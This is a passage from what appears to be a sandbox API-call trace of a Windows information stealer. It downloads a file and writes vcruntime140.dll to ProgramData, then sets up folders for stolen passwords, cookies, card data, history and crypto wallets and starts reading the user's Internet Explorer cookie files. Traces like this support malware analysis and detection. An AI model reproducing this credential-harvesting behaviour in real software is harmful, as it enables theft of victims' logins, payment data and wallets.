lpBuffer=0x3caeab8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3caeab8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.923] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3caeea0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3caeea0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.923] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3caf288, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3caf288*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.924] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3caf670, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3caf670*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.924] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cafa58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cafa58*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.924] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cafe40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cafe40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.924] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb0228, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb0228*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.924] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb0610, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb0610*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.924] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb09f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb09f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.924] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb0de0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb0de0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.925] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb11c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb11c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.925] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb15b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb15b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.925] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb1998, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb1998*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.925] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb1d80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb1d80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.925] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb2168, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb2168*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.925] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb2550, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb2550*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.925] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb2938, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb2938*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.926] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb2d20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb2d20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.926] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb3108, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb3108*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.926] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb34f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb34f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.926] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb38d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb38d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.926] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb3cc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb3cc0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.926] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb40a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb40a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.927] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb4490, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb4490*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.927] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb4878, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb4878*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.927] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb4c60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb4c60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.927] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb5048, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb5048*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.927] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb5430, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb5430*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.927] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb5818, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb5818*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.927] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb5c00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb5c00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.928] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb5fe8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb5fe8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.928] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb63d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb63d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.928] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb67b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb67b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.928] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb6ba0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb6ba0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.928] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb6f88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb6f88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.928] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb7370, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb7370*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.929] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb7758, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb7758*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.929] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb7b40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb7b40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.929] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb7f28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb7f28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.929] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb8310, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb8310*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.929] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb86f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb86f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.929] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb8ae0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb8ae0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.930] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb8ec8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb8ec8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.930] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb92b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb92b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.930] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb9698, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb9698*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.930] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb9a80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb9a80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.930] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cb9e68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cb9e68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.930] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cba250, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cba250*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.930] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cba638, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cba638*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.931] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbaa20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbaa20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.931] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbae08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbae08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.931] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbb1f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbb1f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.931] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbb5d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbb5d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.931] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbb9c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbb9c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.931] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbbda8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbbda8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.932] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbc190, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbc190*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.932] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbc578, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbc578*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.932] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbc960, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbc960*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.932] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbcd48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbcd48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.932] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbd130, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbd130*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbd518, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbd518*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbd900, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbd900*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbdce8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbdce8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbe0d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbe0d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbe4b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbe4b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbe8a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbe8a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbec88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbec88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbf070, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbf070*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbf458, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbf458*, lpdwNumberOfBytesRead=0x19f504*=0x310) returned 1 [0107.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbf768, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbf768*, lpdwNumberOfBytesRead=0x19f504*=0x0) returned 1 [0107.938] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x1d, lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0 | out: lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0) returned 0 [0107.938] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0107.938] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0107.938] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0107.938] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1068 | out: hHeap=0x29a0000) returned 1 [0107.938] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0107.938] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a1040 [0107.939] CreateFileA (lpFileName="C:\\ProgramData\\\\vcruntime140.dll" (normalized: "c:\\programdata\\vcruntime140.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0107.939] WriteFile (in: hFile=0x28, lpBuffer=0x3cab020*, nNumberOfBytesToWrite=0x14748, lpNumberOfBytesWritten=0x19f6e0, lpOverlapped=0x0 | out: lpBuffer=0x3cab020*, lpNumberOfBytesWritten=0x19f6e0*=0x14748, lpOverlapped=0x0) returned 1 [0107.942] CloseHandle (hObject=0x28) returned 1 [0107.944] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0107.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1040 [0107.944] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Autofill" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\autofill"), lpSecurityAttributes=0x0) returned 1 [0107.944] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0107.944] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1040 [0107.948] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cookies"), lpSecurityAttributes=0x0) returned 1 [0108.104] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0108.104] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1040 [0108.104] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cc"), lpSecurityAttributes=0x0) returned 1 [0108.105] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0108.105] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1040 [0108.105] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\History" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\history"), lpSecurityAttributes=0x0) returned 1 [0108.105] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0108.105] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1040 [0108.105] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\downloads"), lpSecurityAttributes=0x0) returned 1 [0108.106] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0108.106] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1040 [0108.106] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Wallets" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\wallets"), lpSecurityAttributes=0x0) returned 1 [0108.107] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0108.107] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a1040 [0108.107] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files")) returned 1 [0108.108] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0108.108] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a1040 [0108.108] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a1078 [0108.108] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0108.119] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x29a1040 [0108.138] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x29a10b0 [0108.143] CreateFileA (lpFileName="passwords.txt" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\passwords.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x19f418, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x358 [0108.225] GetFileType (hFile=0x358) returned 0x1 [0108.225] CloseHandle (hObject=0x358) returned 1 [0108.230] GetLastError () returned 0x0 [0108.230] SetLastError (dwErrCode=0x0) [0108.230] GetLastError () returned 0x0 [0108.230] SetLastError (dwErrCode=0x0) [0108.234] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a10d0 [0108.234] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a11c0 [0108.234] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0108.234] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a10d0 [0108.234] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1218 [0108.238] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1270 [0108.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1270, cbMultiByte=74, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0108.242] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x94) returned 0x29a12c8 [0108.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1270, cbMultiByte=74, lpWideCharStr=0x29a12c8, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*.txt") returned 74 [0108.242] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a1368 [0108.242] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a12c8 | out: hHeap=0x29a0000) returned 1 [0108.242] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*.txt", lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x2000002, ftCreationTime.dwHighDateTime=0x15, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x2400ebcf, ftLastWriteTime.dwHighDateTime=0x20000, nFileSizeHigh=0x2100c, nFileSizeLow=0x29a04b6, dwReserved0=0x21008, dwReserved1=0x19f2d0, cFileName="\x02Ȁ⳰瞒\x82", cAlternateFileName="￿￿歽谿\x0f")) returned 0xffffffff [0108.323] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1368 | out: hHeap=0x29a0000) returned 1 [0108.329] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1c) returned 0x29a12c8 [0108.337] FindNextFileW (in: hFindFile=0xffffffff, lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x2000002, ftCreationTime.dwHighDateTime=0x15, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x18, ftLastWriteTime.dwLowDateTime=0x2400ebcf, ftLastWriteTime.dwHighDateTime=0x20000, nFileSizeHigh=0x2100c, nFileSizeLow=0x29a04b6, dwReserved0=0x21008, dwReserved1=0x19f2d0, cFileName="\x02Ȁ⳰瞒\x82", cAlternateFileName="￿￿歽谿\x0f")) returned 0 [0108.337] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1270 | out: hHeap=0x29a0000) returned 1 [0108.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a10d0, cbMultiByte=23, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0108.337] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x29a1270 [0108.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a10d0, cbMultiByte=23, lpWideCharStr=0x29a1270, cchWideChar=23 | out: lpWideCharStr="Cookies\\IE_Cookies.txt") returned 23 [0108.337] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a12f0 [0108.337] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1270 | out: hHeap=0x29a0000) returned 1 [0108.337] CreateFileW (lpFileName="Cookies\\IE_Cookies.txt" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cookies\\ie_cookies.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x19f104, dwCreationDisposition=0x4, 